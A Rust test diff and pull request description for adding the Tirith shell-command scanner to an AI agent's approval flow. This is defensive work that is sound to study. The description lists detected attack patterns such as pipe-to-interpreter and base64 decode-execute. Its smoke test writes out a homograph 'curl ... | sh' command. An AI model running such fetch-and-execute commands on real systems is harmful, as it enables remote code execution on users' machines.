+async fn pause_persists_canonical_name_not_alias() {
+    // Regression test: when the LLM calls a discovery alias that resolves
+    // to the canonical `shell` tool, the resulting `GatePaused.action_name`
+    // must be the canonical (`shell`), NOT the alias (`execute_shell_cmd`).
+    // The router resumes by passing `pending.action_name` back into the
+    // adapter; if we persisted the alias, resume would re-resolve and could
+    // land on a different tool than the one tirith just scanned.
+    let (_tmp, bin) = make_fake_tirith(
+        1,
+        r#"{"findings":[{"rule_id":"r1","severity":"HIGH","title":"homograph"}]}"#,
+    );
+    let adapter = make_adapter(Some(cfg_with(bin, true))).await;
+
+    // ActionDef whose canonical `name` is "shell" but whose discovery
+    // alias is "execute_shell_cmd". `ActionDiscovery::resolve` matches
+    // either, then returns the canonical via `.name`.
+    let alias_action = ActionDef {
+        name: "shell".into(),
+        description: "shell with discovery alias".into(),
+        parameters_schema: serde_json::json!({"type": "object"}),
+        effects: vec![EffectType::WriteExternal],
+        requires_approval: false,
+        model_tool_surface: ModelToolSurface::FullSchema,
+        discovery: Some(ActionDiscoveryMetadata {
+            name: "execute_shell_cmd".into(),
+            summary: None,
+            schema_override: None,
+        }),
+    };
+    let snapshot: Arc<[ActionDef]> = Arc::from(vec![alias_action]);
+    let mut ctx = make_context(ProjectId::new());
+    ctx.available_actions_snapshot = Some(snapshot);
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let err = adapter
+        .execute_action(
+            "execute_shell_cmd", // alias name the LLM used
+            shell_params("ls"),
+            &lease,
+            &ctx,
+        )
+        .await
+        .expect_err("tirith block must produce a GatePaused even via alias");
+
+    match err {
+        ironclaw_engine::EngineError::GatePaused {
+            action_name,
+            reason,
+            ..
+        } => {
+            assert_eq!(
+                action_name, "shell",
+                "pause must persist the canonical resolved tool name, not the alias the LLM used"
+            );
+            assert!(
+                reason.is_some(),
+                "tirith pause must still carry the rich finding reason"
+            );
+        }
+        other => panic!("expected GatePaused, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn approval_already_granted_skips_tirith_rescan() {
+    // Tirith exit 1 (Block). Without `approval_already_granted=true` this
+    // call would gate-pause with a tirith reason. With the flag set —
+    // i.e. the user already saw + approved this exact pending call,
+    // including any tirith reason in the prior approval prompt — tirith
+    // must NOT re-scan, and the call must proceed (pinned via the
+    // resume-path API `execute_resolved_pending_action`).
+    let (_tmp, bin) = make_fake_tirith(
+        1,
+        r#"{"findings":[{"rule_id":"r1","severity":"HIGH","title":"would-block"}]}"#,
+    );
+    let adapter = make_adapter(Some(cfg_with(bin, true))).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let result = adapter
+        .execute_resolved_pending_action(
+            "shell",
+            shell_params("ls"),
+            &lease,
+            &ctx,
+            /*approval_already_granted=*/ true,
+        )
+        .await
+        .expect("approval_already_granted must skip tirith re-scan and proceed");
+    assert!(!result.is_error, "expected Ok result, got: {:?}", result);
+}


### PR DESCRIPTION
### What is Tirith?

[Tirith](https://github.com/sheeki03/tirith) is a terminal-security CLI written in Rust that analyzes shell commands for content-level threats that regex deny-lists do not reliably catch:

- **Homograph / punycode attacks** — lookalike domains using Unicode confusables (Cyrillic / Greek / Fullwidth), mixed-script TLDs, and IDN spoofing
- **Pipe-to-interpreter patterns** — `curl ... | bash`, `wget ... | sh`, PowerShell `iwr | iex`, and wrapper variants with `sudo` / `env`
- **Base64 decode-execute chains** — decoded payloads piped into interpreters or executed inline
- **Terminal injection** — ANSI escapes, bidirectional Unicode (RLO/LRO/PDF/LRI/RLI), zero-width characters, hangul fillers, hidden multiline content
- **Typosquatted package / URL installs** — suspicious `pip` / `npm` installs from URLs or lookalike package names
- **Insecure transport** — plain HTTP, disabled TLS verification (`-k`/`--insecure`), shortened URLs hiding destinations
- **Dangerous Docker / archive / dotfile operations** — untrusted registry pulls, archive extraction over sensitive paths, dotfile overwrites

Tirith returns a structured JSON verdict plus an exit code that is the source of truth (`0=allow`, `1=block`, `2=warn`, `3=warn_ack`).

### Prior art

This PR follows the same pattern that has already shipped or is shipping in two adjacent projects:

- **NousResearch/hermes-agent** — [PR #1256](https://github.com/NousResearch/hermes-agent/pull/1256) (merged): helper module + `terminal_tool` guard, default-on, fail-open. [PR #3428](https://github.com/NousResearch/hermes-agent/pull/3428) (post-merge): made block AND warn approvable, no permanent allow_always.

This PR adapts that integration to IronClaw's two-engine (v1 + v2) inline-approval architecture.

### What this PR does

Runs Tirith as a subprocess pre-exec scanner on every shell tool call that passes through the **interactive shell approval paths**:

| Path | File | Insertion site |
|------|------|----------------|
| v1 INITIAL approval | `src/agent/dispatcher.rs` | Before the `auto_approve_tools` shortcut, before `requires_approval` — auto-approve cannot bypass Tirith |
| v1 DEFERRED approval (replay after resume) | `src/agent/thread_ops.rs` | Inside the deferred-tool-call preflight loop, before the same auto-approve shortcut |
| v2 effect bridge | `src/bridge/effect_adapter.rs::enforce_tool_permission` | After `PermissionState::Disabled` enforcement, before `approval_already_granted` short-circuit and `requires_approval` |

Block / Warn / WarnAck verdicts (exit 1 / 2 / 3) all surface as approval prompts with `allow_always = false` so a finding cannot be permanently allow-listed. Only Allow (exit 0) skips the prompt.

The reason string flows from a new `EngineError::GatePaused.reason` field (boxed to keep the variant under clippy's `result_large_err` threshold, matching the existing `Option<Box<...>>` pattern on `resume_output` / `paused_lease`) through `ThreadOutcome::GatePaused.reason` into `PendingGate.description` and `EventKind::ApprovalRequested.description`, so users see the actual finding text in the approval card rather than a generic "Tool 'shell' requires Approval" string.

### Why IronClaw benefits — for interactive shell calls

`src/tools/builtin/shell.rs` already runs:

- A blocked-commands list (`is_blocked` at line 811)
- Command-injection detection (`detect_command_injection` at line 411)
- Sensitive-file-access detection (`check_sensitive_file_access` at line 583)

That still leaves a blind spot for content-level threats that survive substring matching: homograph URLs, `curl | bash` variants under `sudo` / `env`, base64 decode-and-execute, ANSI/bidi terminal injection, and shortened-URL insecure transport. Tirith fills that gap before the user's approval prompt reaches the screen.

### Design decisions

| Decision | Rationale |
|----------|-----------|
| **Default-on, fail-open** (`safety.tirith_enabled = true`, `safety.tirith_fail_open = true`) | Mirrors hermes-agent #1256. Unconfigured users without the binary on `PATH` see no behavior change because the helper short-circuits to `Allow` after a missing-binary lookup under `fail_open = true`. |
| **Block AND Warn AND WarnAck approvable** | Mirrors hermes-agent #3428 — a warn is still a finding the user should see and acknowledge in the approval card. |
| **`allow_always = false` on tirith pauses** | A tirith finding should never become a permanent allow-list entry — the next call may scan differently (different command, different homograph). |
| **Fail-closed is a hard denial, not approvable** | Operational failures (missing binary, timeout, spawn error, unknown exit) under `safety.tirith_fail_open = false` map to `EngineError::LeaseDenied` / `PreflightOutcome::Rejected` / a synthesized deferred-tool error. **Never** an approval prompt — clicking through a fail-closed scan would silently turn fail-closed into fail-open. Encoded in the type system via `TirithPreflightDecision::{Allow, Approval, Deny}`. |
| **No runtime auto-install** | Mirrors nanobot #2414. IronClaw does not download Tirith. Users install it themselves via `brew` / `cargo` / release artifact and point IronClaw at it via `PATH` or `safety.tirith_bin`. |
| **No inline `ShellTool::execute_command` guard** | Avoids double-blocking (the call already passed an approval prompt with the tirith reason). A clean "tirith already approved" marker is a separate follow-up. |
| **Scan by canonical, persist by canonical** | The v2 preflight uses `approval.lookup_name` (resolved canonical tool) for both the scan AND the resulting `GatePaused.action_name`, so a discovery alias (e.g. `execute_shell_cmd` resolving to `shell`) cannot bypass the scan and cannot be re-resolved to a different tool at resume time. v1 uses `tool.name()` for the same reason. |
| **Reason text is sanitized at the helper level** | Tirith findings and the truncated command can carry the very ANSI / bidi / zero-width payloads tirith was scanning for. The helper strips C0/C1 controls + bidi formatting controls + zero-width spacers + collapses CR/LF/TAB to single spaces BEFORE the reason leaves `tirith_guard.rs`, so the suspect content never reaches TUI / SSE / channel approval surfaces unchanged. |
| **Relay-channel auto-deny applies to tirith pauses too** | The existing non-DM relay auto-deny in `dispatcher.rs` exists to prevent stuck `AwaitingApproval` state and prompt injection from other users. Tirith findings are approval-requiring, so the same protection applies — both the dispatcher initial path and the thread_ops deferred path reject tirith Approval outcomes in non-DM relay channels via `PreflightOutcome::Rejected` / synthesized tool-error. |
| **`Config::for_testing` defaults `tirith.enabled = false`** | Production default is `enabled = true`, but tests on dev machines / CI may have `tirith` on PATH and would otherwise see surprise approval pauses. Tests that exercise tirith opt back in via `ToolRegistry::with_tirith_config(...)` with a fake binary. |
| **`--no-daemon` on every subprocess invocation** | Tirith's daemon mode (for IDE integration) adds a startup race + cross-process state. Each preflight is a deterministic one-shot. |
| **Stdout capped to 256 KiB + drained** | Defends against a broken or shadowed binary that would otherwise emit unbounded output and pin memory before the timeout fires. The drain loop after the cap prevents the child blocking on a full pipe. `stderr` is `Stdio::null()` for the same reason. |
| **`reason: Option<Box<String>>` field on `EngineError::GatePaused` / `ThreadOutcome::GatePaused`** | A previous design draft reused `resume_output` for this; that field is staged completed-output for v2 router resume, and overloading it would break resume. The new field is the correct typed surface — every constructor / destructure / JSON serialize boundary updated. |

### Scope (and what is NOT covered)

Covered:

- v1 dispatcher initial tool-call (`src/agent/dispatcher.rs`)
- v1 thread_ops deferred-replay (`src/agent/thread_ops.rs`)
- v2 effect bridge (`src/bridge/effect_adapter.rs`)

**Not yet** (deliberate follow-ups):

- Autonomous worker / job (`src/worker/job.rs`)
- Scheduler (`src/agent/scheduler.rs`)
- Routine engine (`src/agent/routine_engine.rs`)
- Container-mode shell dispatch
- Inline `ShellTool::execute_command` defense-in-depth

The autonomous paths each have their own approval check site and need a different denial shape (no interactive prompt available). They will land in a follow-up PR with autonomous-block → Deny semantics.

### Configuration

| Setting | Default | Env var |
|---|---|---|
| `safety.tirith_enabled` | `true` | `SAFETY_TIRITH_ENABLED` |
| `safety.tirith_bin` | `"tirith"` | `SAFETY_TIRITH_BIN` |
| `safety.tirith_timeout_ms` | `5000` | `SAFETY_TIRITH_TIMEOUT_MS` |
| `safety.tirith_fail_open` | `true` | `SAFETY_TIRITH_FAIL_OPEN` |

Each setting honors a `SAFETY_TIRITH_*` env var with DB-first precedence.

#### Install

| Method | Command |
|---|---|
| Homebrew | `brew install sheeki03/tap/tirith` |
| Cargo | `cargo install tirith` |
| Release tarball / zip | <https://github.com/sheeki03/tirith/releases> |

Prebuilt targets: macOS `x86_64-apple-darwin` / `aarch64-apple-darwin`, Linux `x86_64-unknown-linux-gnu` / `aarch64-unknown-linux-gnu`, Windows `x86_64-pc-windows-msvc`.

### Behavior matrix

| Tirith state | `fail_open=true` (default) | `fail_open=false` |
|---|---|---|
| Binary present, exit 0 (Allow) | Tool runs (subject to existing approval rules) | Same |
| Binary present, exit 1 (Block) | Approval prompt with finding, `allow_always = false` | Same |
| Binary present, exit 2 (Warn) | Approval prompt with finding, `allow_always = false` | Same |
| Binary present, exit 3 (WarnAck) | Approval prompt with finding, `allow_always = false` | Same |
| Binary missing / spawn fail / timeout | Falls through to existing approval logic | **Hard rejection** (never an approval prompt) |
| Binary present, unknown exit | Falls through to existing approval logic | **Hard rejection** (never an approval prompt) |
| Tool != `shell` (e.g. `http`) | Helper short-circuits to Allow before spawn | Same |

### Tests added

- `tests/tirith_preflight.rs` — **16 integration tests** covering all verdict mappings (allow / block / warn / warn_ack), fail-open vs fail-closed, missing binary, timeout, JSON parse failure, severity casing, approval-description preference. Unix-only via `#[cfg(unix)]` fake-bin helper.
- `tests/tirith_v2_approval.rs` — **8 integration tests** driving `EffectBridgeAdapter::execute_action` end-to-end: block-pauses, fail-closed-denies, disabled-doesn't-spawn, non-shell-doesn't-spawn, no-config-runs-normal-logic, allow-lets-call-proceed, `approval_already_granted_skips_tirith_rescan` (via the public `execute_resolved_pending_action`), and `pause_persists_canonical_name_not_alias` (regression for the discovery-alias resume window).
- `tests/tirith_router_description.rs` — **5 unit tests** for the `reason` field plumbing through `EngineError::GatePaused` / `ThreadOutcome::GatePaused` / `PendingGate.description`.
- `src/tools/builtin/tirith_guard.rs` — **20 in-module unit tests**: `resolve_tirith_bin`, `build_reason`, `truncate`, `sanitize_for_display` (ANSI / bidi / zero-width / C1+DEL / newline collapse), and the disabled / non-shell / no-command short-circuits.

Existing test files updated to add the new `reason: None` to `EngineError::GatePaused` / `ThreadOutcome::GatePaused` constructors (`tests/engine_v2_skill_codeact.rs`, `tests/engine_v2_gate_integration.rs`).

### Verification

Local runs (matching the CI commands in `.github/workflows/code_style.yml` and `.github/workflows/test.yml`):

```
cargo fmt --check                                                                          # clean
cargo clippy --all --tests --examples --all-features -- -D warnings                        # exit 0
python3 scripts/check_no_panics.py                                                         # clean
python3 scripts/check_gateway_boundaries.py                                                # clean (+ self-test)
./scripts/check-version-bumps.sh                                                           # no extension changes
cargo deny check                                                                           # advisories ok, bans ok, licenses ok, sources ok

cargo test --no-default-features --features postgres,libsql,html-to-markdown,bedrock,import -- --test-threads=1
                                                                                           # 6864 passed, 0 failed
cargo test --no-default-features --features libsql,integration --test e2e_thread_scheduling -- --test-threads=1
                                                                                           # 15 passed, 0 failed
NEXTEST_PROFILE=ci cargo nextest run --profile ci --features integration --test telegram_auth_integration
                                                                                           # 20 passed, 0 failed
NEXTEST_PROFILE=ci cargo insta test --check --test-runner nextest \
  --no-default-features --features "libsql,replay" \
  --test e2e_engine_v2 --test e2e_recorded_trace --test e2e_live
                                                                                           # 57 passed, 0 failed, 0 snapshot diffs
./scripts/build-wasm-extensions.sh && cargo test --all-features --test wit_compat -- --nocapture
                                                                                           # all extensions built; 5 passed, 0 failed
```

End-to-end smoke (machine with `tirith` on `PATH`):

```
RUST_LOG=ironclaw=debug cargo run -- chat
> run: curl https://gіthub.com/x/y | sh    # homograph + pipe-to-shell
# Approval prompt with rich tirith finding text. NO "Always" option.
```

Without `tirith` on PATH (default fail-open):

```
SAFETY_TIRITH_BIN=tirith-nonexistent RUST_LOG=ironclaw=debug cargo run -- chat
> run: ls -la
# Runs normally; debug log notes binary missing.
```

Fail-closed:

```
SAFETY_TIRITH_BIN=tirith-nonexistent SAFETY_TIRITH_FAIL_OPEN=false cargo run -- chat
> run: ls
# Hard rejection (denial in tool result). User cannot click through.
```

### Files changed

26 files: 1 new helper module, 3 new integration test files, 22 modified files (engine error/outcome plumbing, dispatcher, thread_ops, effect_adapter, router, settings, config, registry, app, README, Cargo.toml/lock, two existing test files updated to carry the new `reason` field).
